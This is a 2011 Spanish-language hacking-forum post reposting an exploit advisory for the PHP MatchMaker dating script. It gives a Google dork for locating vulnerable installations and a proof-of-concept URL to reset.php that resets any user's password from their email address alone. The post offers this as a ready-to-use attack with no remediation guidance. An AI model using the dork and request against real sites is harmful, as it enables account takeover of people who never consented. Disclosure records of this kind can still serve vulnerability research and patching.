Underc0de
[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: hielasangre en Agosto 27, 2011, 05:43:42 PM
# Exploit Title : PHP MatchMaker Remote User Reset Password Vulnerability
# Google Dork: allintext: Powered by PHP MatchMaker
# Date: 23/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.deltascripts.com/phpmatchmaker/
# Tested on: Linux
Dedicado a Duraznito y en especial a mi madre que es lo mas grande que hay :p
[POC]
If you know the email of any user can reset your password for an unlimited
visiting the following url
http://localhost/reset.php?email=[[email protected]]&submit=Continue